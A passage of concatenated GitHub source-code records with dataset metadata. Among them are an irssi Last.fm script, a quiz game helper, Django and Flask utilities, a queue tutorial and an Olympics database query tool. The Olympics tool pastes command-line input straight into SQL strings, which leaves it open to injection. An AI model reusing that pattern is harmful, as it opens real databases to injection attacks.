urllib.urlencode(dict(\n method='user.getrecenttracks',\n user=username,\n api_key=api_key,\n limit='1')))\n tree = objectify.parse(url)\n assert tree.getroot().get('status') == 'ok'\n track = tree.xpath('/lfm/recenttracks/track')[0]\n parts_dict = {}\n for part in parts:\n if part == 'date':\n if track.get('nowplaying') == 'true':\n value = u''\n else:\n tt = time.localtime(int(track.date.get('uts')))\n value = time.strftime(lastfm_strftime, tt).decode(\n irssi_encoding)\n else:\n value = unicode(getattr(track, part, u''))\n parts_dict[part] = value\n print (\n lastfm_output.decode(irssi_encoding) % parts_dict\n ).encode(irssi_encoding)\n\ndef do_now_playing(data, server, witem):\n def on_result(pid, status):\n if not os.WIFEXITED(status):\n sys.stderr.write('child %d exited abnormally: status %d\\n' % (\n pid, status))\n return\n stdout, stderr = proc.stdout.read(), proc.stderr.read()\n if os.WEXITSTATUS(status):\n irssi.prnt(stderr.rstrip())\n elif irssi.settings_get_bool('lastfm_use_action'):\n witem.command('me %s' % stdout.rstrip())\n else:\n witem.command('say %s' % stdout.rstrip())\n username = data or irssi.settings_get_str('lastfm_user')\n irssi_encoding = irssi.settings_get_str('term_charset')\n lastfm_strftime = irssi.settings_get_str('lastfm_strftime')\n lastfm_output = irssi.settings_get_str('lastfm_output')\n proc = subprocess.Popen([\n sys.executable, __file__, \n username, irssi_encoding, lastfm_strftime, lastfm_output],\n stdin=open(os.devnull), stdout=subprocess.PIPE, stderr=subprocess.PIPE, \n close_fds=True)\n glib.child_watch_add(proc.pid, on_result)\n\nif __name__ == '__main__':\n lastfm_lookup()\nelse:\n import irssi\n irssi.settings_add_str('lastfm', 'lastfm_user', '')\n irssi.settings_add_str('lastfm', 'lastfm_output', \n 'np: %(artist)s-%(name)s')\n irssi.settings_add_str('lastfm', 'lastfm_output_tab_complete', '')\n irssi.settings_add_str('lastfm', 'lastfm_strftime', 'scrobbled at: %R %Z')\n irssi.settings_add_bool('lastfm', 'lastfm_use_action', 0)\n irssi.settings_add_bool('lastfm', 'lastfm_get_player', 0)\n irssi.command_bind('np', do_now_playing)\n", "repo_name": "habnabit/dotfiles", "sub_path": "irssi/scripts/lastfm.py", "file_name": "lastfm.py", "file_ext": "py", "file_size_in_byte": 2843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 17, "usage_type": "call"}, {"api_name": "lxml.objectify.parse", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.objectify", "line_number": 22, "usage_type": "name"}, {"api_name": "time.localtime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.WIFEXITED", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.WEXITSTATUS", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 61, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "glib.child_watch_add", "line_number": 63, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 69, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 70, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 72, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 73, "usage_type": "call"}, {"api_name": "irssi.settings_add_bool", "line_number": 74, "usage_type": "call"}, {"api_name": "irssi.settings_add_bool", "line_number": 75, "usage_type": "call"}, {"api_name": "irssi.command_bind", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "72872289083", "text": "# -*- coding: utf-8 -*-\nimport os\nfrom time import sleep\nimport time\nfrom random import randint\nimport modules.config as con\n\n\n# work with OS\ndef end():\n print('Сыграем ещё?:', end=' ')\n \n stat = input().lower()\n if stat == 'да':\n os.system('cls')\n os.system('run.bat')\n elif stat == 'нет':\n print('Тогда пока!')\n sleep(1)\n path_parent = os.getcwd()\n os.system(path_parent + \"/exit.bat\")\n\n else:\n print(con.name + ', я тебя не понял!(((')\n end()\n\ndef recording():\n coins = 0\n if con.d == 'легкая' and con.status == 'Win':\n coins = 10\n elif con.d == 'средняя' and con.status == 'Win':\n coins = 20\n elif con.d == 'тяжелая' and con.status == 'Win':\n coins = 60\n bcoins = str(bin(coins))\n idp = str(randint(400000, 900000))\n fud = 'user_data.txt'\n f = open(fud, 'w')\n f.write(\"Game over in \" + t + \"\\n\")\n f.write(\"ID player: \" + idp + \"\\n\")\n f.write(\"Your name: \" + con.name + \"\\n\")\n f.write(\"Chosen difficulty: \" + con.d + \"\\n\")\n f.write(\"Game result: \" + con.status + \"\\n\")\n if con.d == 'песочница':\n f = open(fud, 'a')\n f.write(\"Cheats: \" + con.cheats + \"\\n\")\n f.write(\"Coins: \" + bcoins + \"\\n\")\n f.close()\n\ndef statistic():\n global t\n t = time.asctime(time.localtime(time.time()))\n print('Хотите просмотреть свою статистику по текущей игре?:', end=' ')\n stat = input().lower()\n if stat == 'да':\n recording()\n os.system('run_file.bat')\n os.system('CLS')\n end()\n elif stat == 'нет':\n os.system('CLS')\n end()\n else:\n print(con.name + ', я тебя не понял!(((')\n print()\n statistic()\n", "repo_name": "ilyazheprog/game_num", "sub_path": "modules/work_with_OS.py", "file_name": "work_with_OS.py", "file_ext": "py", "file_size_in_byte": 1845, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 24, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 29, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 29, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 29, "usage_type": "attribute"}, {"api_name": "modules.config.d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 31, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 31, "usage_type": "attribute"}, {"api_name": "modules.config.d", "line_number": 33, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 33, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 41, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 41, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 42, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 42, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 43, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 43, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.config.cheats", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 46, "usage_type": "name"}, {"api_name": "time.asctime", "line_number": 52, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "os.system", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 58, "usage_type": "call"}, {"api_name": "os.system", "line_number": 61, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 64, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "37241025395", "text": "from rest_framework.exceptions import ValidationError\nfrom ..models.banner import Banner\nfrom ..serializers.banner import BannerSerializer\nfrom ..constants import BANNER_DOES_NOT_EXIST\nfrom ..utils.paginate import paginate_queryset\n\n\ndef list_banner(\n is_active=True,\n area_id=None,\n page=1,\n page_size=10,\n ordering=None,\n search=None,\n):\n banner = Banner.objects.all().filter(is_deleted=False)\n if is_active is not None:\n banner = banner.filter(is_active=is_active)\n if area_id is not None:\n banner = banner.filter(area_id=area_id)\n if search:\n banner = banner.filter(area__name__icontains=search)\n if not ordering:\n ordering = \"sequence\"\n banner = banner.order_by(ordering)\n data = paginate_queryset(queryset=banner, page=page, page_size=page_size)\n # serializers = BannerSerializer(data.get(\"results\"), many=True)\n # data[\"results\"] = serializers.data\n return data\n\n\ndef create_banner(data):\n banner = Banner.objects.create(**data)\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n\n\ndef update_banner(pk, data):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(id=pk)\n data.pop(\"image\")\n serializers = BannerSerializer(banner, data)\n if serializers.is_valid(raise_exception=True):\n kwargs = {}\n if data.get(\"area\", {}):\n kwargs[\"area_id\"] = data.get(\"area\").get(\"id\")\n serializers.save(**kwargs)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef get_banner(pk):\n try:\n banner = Banner.objects.filter(is_deleted=False, is_active=True).get(\n id=pk\n )\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef delete_banner(pk):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(pk=pk)\n return banner.delete()\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef upload_image(pk, image_data):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(id=pk)\n banner.image_data = image_data\n banner.save()\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n", "repo_name": "mycity360-project/mycity360-backend", "sub_path": "backend/backend/gateways/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.banner.Banner.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.paginate.paginate_queryset", "line_number": 26, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects.create", "line_number": 33, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 33, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 41, "usage_type": "name"}, {"api_name": "serializers.banner", "line_number": 43, "usage_type": "name"}, {"api_name": "serializers.banner.BannerSerializer", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.banner.is_valid", "line_number": 44, "usage_type": "call"}, {"api_name": "serializers.banner", "line_number": 44, "usage_type": "name"}, {"api_name": "serializers.banner.save", "line_number": 48, "usage_type": "call"}, {"api_name": "serializers.banner", "line_number": 48, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 52, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 52, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 57, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 64, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 64, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 69, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 72, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 72, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 77, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 83, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 84, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "31397882614", "text": "# -*- coding: utf-8 -*-\n#\n# Created by lixing1611 on 17-4-18\n#\nfrom __future__ import absolute_import, unicode_literals\nfrom flask import json\nfrom copy import deepcopy\nfrom bson import ObjectId\nimport requests\n\n\"\"\"\n小工具\n\"\"\"\n\n\nclass BsonSerializer(object):\n def __init__(self, bson):\n self.bson = deepcopy(bson)\n\n def serialize_object_id(self):\n self.bson['_id'] = str(self.bson['_id'])\n return self.bson\n\n @staticmethod\n def serialize_cursor(cursor):\n \"\"\"\n 序列化一个查询结果,里面包含ObjectID\n :param cursor: query cursor object\n :return: serialization list\n \"\"\"\n qrs = []\n for record in cursor:\n record['_id'] = str(record['_id'])\n qrs.append(record)\n return qrs\n\n @staticmethod\n def serialize_fs_files(cursor):\n qrs = []\n for record in cursor:\n record['_id'] = str(record['_id'])\n record['uploadDate'] = str(record['uploadDate'])\n qrs.append(record)\n return qrs\n\n @staticmethod\n def serialize_fs_file(fs_file):\n fs_file['_id'] = str(fs_file['_id'])\n fs_file['uploadDate'] = str(fs_file['uploadDate'])\n return fs_file\n\n def serialize_ov_item(self):\n for site in self.bson.get('sites'):\n info = site['info']\n site['info'] = {'collection': info.collection, '_id': str(info.id)}\n return self.bson\n\n\nclass MongoPagination(object):\n def __init__(self, clt):\n self.clt = clt # collection\n\n def query(self, query_dict, fields=None, last_id=None, limit=10):\n query_dict = deepcopy(query_dict)\n if last_id:\n query_dict['_id'] = {'$gt': ObjectId(last_id)}\n if fields:\n return self.clt.find(query_dict, fields).sort('_id', 1).limit(limit)\n else:\n return self.clt.find(query_dict).sort('_id', 1).limit(limit)\n else:\n if fields:\n return self.clt.find(query_dict, fields).sort('_id', 1).limit(limit)\n else:\n return self.clt.find(query_dict).sort('_id', 1).limit(limit)\n\n\ndef proxy_api(host, api, data):\n url = host + api\n s = json.dumps(data)\n # url = 'http://api.bto-dev.utoper.com/user/account/authcode/phone?phone=15700064975&flag=flag'\n headers = {'content-type': 'application/json',\n 'appId': 'AP339457443459235841',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}\n req = requests.post(url, data=s, headers=headers)\n print(req)\n if req.ok():\n return req.json()\n return None\n", "repo_name": "bi38324/17021001-lung", "sub_path": "app/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "copy.deepcopy", "line_number": 18, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 64, "usage_type": "call"}, {"api_name": "bson.ObjectId", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "35784462925", "text": "\"\"\"A queue is a common data structure in computer science and programming that operates\non a \"first-in, first-out\" (FIFO) basis. It's a linear data structure that follows a specific order for adding and\nremoving elements. In a queue, the first element added to the queue is the first one to be removed, similar to people\nwaiting in a line (queue) for a service, like in a supermarket checkout.\n\nKey characteristics of a queue:\n\nFIFO Order: The fundamental principle of a queue is to maintain the order in which elements were added. The element\nthat has been in the queue the longest (the front) is the first to be removed.\n\nTwo Primary Operations:\n\nEnqueue (Add): Adding an element to the back (or rear) of the queue. This operation is also known as \"push\" or\n\"insert.\" Dequeue (Remove): Removing the element from the front (or head) of the queue. This operation is also known\nas \"pop.\" Peek Operation: A method to look at the front element without removing it. It allows you to inspect the\nelement that will be dequeued next.\n\nSize Operation: A method to determine the number of elements currently in the queue.\"\"\"\n\nfrom typing import Any\n\n\nclass Queue:\n \"\"\"A simple queue data structure implemented in Python.\"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize an empty queue.\n \"\"\"\n self.items = []\n\n def is_empty(self) -> bool:\n \"\"\"\n Check if the queue is empty.\n\n Returns:\n bool: True if the queue is empty, False otherwise.\n \"\"\"\n return len(self.items) == 0\n\n def size(self) -> int:\n \"\"\"\n Get the number of elements in the queue.\n\n Returns:\n int: The number of elements in the queue.\n \"\"\"\n return len(self.items)\n\n def enqueue(self, item: Any) -> None:\n \"\"\"\n Add an item to the end of the queue.\n\n Args:\n item (Any): The item to be added to the queue.\n \"\"\"\n self.items.append(item)\n\n def dequeue(self) -> Any:\n \"\"\"\n Remove and return the item from the front of the queue.\n\n Returns:\n Any: The item removed from the queue.\n \"\"\"\n if not self.is_empty():\n return self.items.pop(0)\n\n def peek(self) -> Any:\n \"\"\"\n Get the item at the front of the queue without removing it.\n\n Returns:\n Any: The item at the front of the queue.\n \"\"\"\n if not self.is_empty():\n return self.items[0]\n\n\n# Example usage:\nqueue = Queue()\n\nqueue.enqueue(1)\nqueue.enqueue(2)\nqueue.enqueue(3)\n\nprint(\"Queue size:\", queue.size()) # Output: Queue size: 3\nprint(\"Front of the queue:\", queue.peek()) # Output: Front of the queue: 1\n\nitem = queue.dequeue()\nprint(\"Dequeued item:\", item) # Output: Dequeued item: 1\nprint(\"Queue size after dequeue:\", queue.size()) # Output: Queue size after dequeue: 2\n\n# ==========================================================================================================\n\n# Initialize an empty list to represent the queue\nqueue = []\n\n# Enqueue (add) elements to the back of the queue\nqueue.append(1)\nqueue.append(2)\nqueue.append(3)\n\n# Display the queue\nprint(\"Queue:\", queue) # Output: Queue: [1, 2, 3]\n\n# Dequeue (remove) elements from the front of the queue\nif queue:\n front_element = queue.pop(0)\n print(\"Dequeued element:\", front_element) # Output: Dequeued element: 1\nelse:\n print(\"Queue is empty\")\n\n# Peek at the front element without removing it\nif queue:\n front_element = queue[0]\n print(\"Front element:\", front_element) # Output: Front element: 2\nelse:\n print(\"Queue is empty\")\n\n# Determine the size of the queue\nqueue_size = len(queue)\nprint(\"Queue size:\", queue_size) # Output: Queue size: 2\n", "repo_name": "shukranjs/Python-Data-Structures", "sub_path": "data_structures/queue.py", "file_name": "queue.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "43376877726", "text": "'''\nolympics.py \n10/22/2022\nAuthor: Cathy Duan\n\nDB-driven command-line application assignment \nCS 257: Software Design \nCarleton College\n\nNote: Adapted from Jeff Ondich's psycopg2-sample.py code.\n'''\n\nimport sys\nimport psycopg2\nimport config\n\n\ndef get_connection():\n try:\n return psycopg2.connect(database=config.database, user=config.user)\n \n except Exception as e:\n print(e, file=sys.stderr)\n exit()\n\n\ndef get_athletes(NOC):\n ''' Returns a list of the full names of all the athletes\n in the database who have competed for a user-inputted NOC'''\n athletes = []\n try:\n # Create a \"cursor\"\n connection = get_connection()\n cursor = connection.cursor()\n\n # Execute the query\n query = ''' SELECT DISTINCT athletes.athlete_name\n FROM athletes, team_NOC, event_results\n WHERE team_NOC.NOC = ''' + \"'\" + NOC + \"'\" '''\n AND athletes.id = event_results.athlete_id\n AND team_NOC.id = event_results.team_NOC_id; '''\n cursor.execute(query, (NOC,))\n\n # Iterate over the query results to produce the list of athlete names.\n for row in cursor:\n full_name = row[0]\n athletes.append(f'{full_name}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n connection.close()\n return athletes\n\ndef get_NOCs_medal_count(medal_type):\n ''' Returns a list of all NOCs and the count of how many gold medals each NOC has won.'''\n NOCS = []\n medal_count = []\n try:\n query = ''' SELECT COUNT(event_results.medal), team_NOC.NOC\n FROM team_NOC, event_results\n WHERE event_results.medal = ''' + \"'\" + medal_type + \"'\" '''\n AND team_NOC.id = event_results.team_NOC_id\n GROUP BY team_NOC.NOC\n ORDER BY COUNT(event_results.medal) DESC; '''\n connection = get_connection()\n cursor = connection.cursor()\n cursor.execute(query, ())\n for row in cursor:\n count = row[0]\n NOC = row[1]\n medal_count.append(count)\n NOCS.append(f'{NOC}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n connection.close()\n return NOCS, medal_count\n\ndef get_events_for_sport(sport, NOC):\n ''' Returns a list of all the sport events that the given encompasses for a given '''\n sport_events = []\n try:\n query = ''' SELECT DISTINCT events.sport_event, team_NOC.NOC\n FROM events, team_NOC, event_results\n WHERE events.sport = ''' + \"'\" + sport + \"'\" '''\n AND team_NOC.NOC = ''' + \"'\" + NOC + \"'\" '''\n AND team_NOC.id = event_results.team_NOC_id; '''\n \n connection = get_connection()\n cursor = connection.cursor()\n cursor.execute(query, (sport, NOC,))\n\n for row in cursor:\n sport_event = row[0]\n sport_events.append(f'{sport_event}')\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n connection.close()\n return sport_events\n\n\n# Prints out a NOC's list of athletes\ndef athlete_print(athletes):\n for athlete in athletes: \n print (athlete)\n\n# Prints out each NOC's medal count, the medal type depends on input\ndef NOC_medal_print(NOCs, medal_count):\n for i in range(len(NOCs)):\n print(NOCs[i] + \", \" + str(medal_count[i]) + \" \" + sys.argv[2] + \" medals\")\n\n# Prints out a NOC's list of sport events for a specific sport\ndef event_print(sport_events):\n for event in sport_events:\n print(event)\n\n# Opens, reads, and prints the usage statement\ndef usage_statement_print():\n file = open(\"usage.txt\")\n print(file.read())\n\n\ndef main():\n user_input = sys.argv[1:] # Ignores olympics.py in the command line\n length = len(user_input)\n\n \n if sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\":\n usage_statement_print()\n\n elif length == 2: \n if sys.argv[1] == \"athletes\" or sys.argv[1] == \"-a\":\n athletes = get_athletes(sys.argv[2])\n athlete_print(athletes)\n elif sys.argv[1] == \"NOCs\" or sys.argv[1] == \"-n\":\n NOCs, medal_count = get_NOCs_medal_count(sys.argv[2])\n NOC_medal_print(NOCs, medal_count)\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n elif sys.argv[1] == \"events\" or sys.argv[1] == \"-e\": \n if length == 3: \n sport_events = get_events_for_sport(sys.argv[2], sys.argv[3])\n event_print(sport_events)\n elif length > 3: # if the sport is multiple words\n sport = \"\" #sys.argv[2:-1] is a list and needs to be a joined as a string\n for i in (2, length-1):\n if i == 2:\n sport = sys.argv[i]\n else: \n sport = sport + \" \" + sys.argv[i]\n sport_events = get_events_for_sport(sport, sys.argv[-1])\n event_print(sport_events)\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n else: \n print(\"Please refer to the usage statement below\")\n usage_statement_print()\n\nif __name__ == '__main__':\n main()\n", "repo_name": "cathduan/cs257", "sub_path": "olympics/olympics.py", "file_name": "olympics.py", "file_ext": "py", "file_size_in_byte": 5334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "psycopg2.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "config.database", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.user", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 128, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 132, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 136, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 139, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 140, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 147, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "6245067304", "text": "from collections import defaultdict\ndef solution(n, s, a, b, fares):\n graph_fare = {}\n graph_node = {}\n for i in range(n):\n graph_fare[i+1] = defaultdict(int)\n graph_node[i+1] = list()\n \n for fare in fares:\n graph_fare[fare[0]][fare[1]] = fare[2]\n graph_fare[fare[1]][fare[0]] = fare[2]\n graph_node[fare[0]].append(fare[1])\n graph_node[fare[1]].append(fare[0])\n \n print('graph_fare: ', graph_fare)\n print('graph_node: ', graph_node)\n answer = 0\n return answer\n", "repo_name": "oswaldeff/programmers", "sub_path": "2021_KAKAO_BLIND_RECRUITMENT_TaxiFare.py", "file_name": "2021_KAKAO_BLIND_RECRUITMENT_TaxiFare.py", "file_ext": "py", "file_size_in_byte": 532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "86340794694", "text": "from django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, HttpResponseRedirect\nfrom django.core import serializers\nfrom home.models import *\nfrom django.db.models import F\nfrom home.forms import *\nimport json\nimport random\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.contrib.auth.models import Group\nimport sys\n\n\n\ndef index(request):\n\tproject_list = Project.objects.filter(publish=True).filter(Q(status_id=1) | Q(status_id=2)).order_by(\"-fiscalyear\")[:10]\n\tyear_list = Ripples.objects.all().distinct('year').order_by('-year').values('year')\n\tripple_list = serializers.serialize('json', Ripples.objects.all().order_by('-year'))\n\tripple_article = serializers.serialize('json', Ripplesarticle.objects.all())\n\treturn render(request, 'home/index.html', {'projects': project_list, 'years': year_list, 'ripples': ripple_list, 'articles': ripple_article})\n\ndef sitemap(request):\n\treturn render(request, 'home/sitemap.html')\n\ndef gen_key():\n\talphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'\n\tkey = ''\n\tfor x in range(50):\n\t\ti = random.randrange(0, len(alphabet))\n\t\tkey = key+alphabet[i]\n\treturn key\n\ndef send_email_confirmation(request, email):\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\n\tkey = subscriber.confirmation_key\n\n\tto = [subscriber.email,]\n\tfrm = 'infotech@grmw.org'\n\tsubj = \"Email Verification\"\n\tverify_href = \"http://\"+str(get_current_site(request))+\"/confirm_subscriber/\"+str(email)+\"/\"+str(key)+\"/\"\n\tunsubscribe_href = \"http://\"+str(get_current_site(request))+\"/unsubscribe/\"+str(email)+\"/\"+str(key)+\"/\"\n\n\tcontext = {\n\t\t'verify_href': verify_href,\n\t\t'unsubscribe_href': unsubscribe_href,\n\t}\n\n\tcontent = get_template('home/email_subscriber_template.html').render(Context(context))\n\n\tsend_mail(subj, \"PLAIN TEXT\", frm, to, fail_silently=False, html_message=content)\n\ndef subscribe(request):\n\tpayload = {\n\t\t'success': False,\n\t\t'message': 'An error occurred while processing your request.',\n\t\t'data': {'error': 'POST ERROR - request.method does not contain POST.'},\n\t}\n\tif request.method == 'POST':\n\t\temail = request.POST['email']\n\t\tform = add_subscriber(request.POST or None)\n\t\tif form.is_valid():\n\t\t\t#Save the user's email to the database with unique key\n\t\t\tform = form.save(commit=False)\n\t\t\tform.confirmation_key = gen_key()\n\t\t\tform.email = email\n\t\t\tform.save()\n\n\t\t\t#Send confirmation email to user\n\t\t\tsend_email_confirmation(request, email)\n\n\t\t\tpayload = {\n\t\t\t\t'success': True, \n\t\t\t\t'message': 'An email has been sent to the supplied address, please click the link in the email to confirm your email address. Please note: if you do not complete this step, you will NOT be able to receive electronic copies of our Ripples 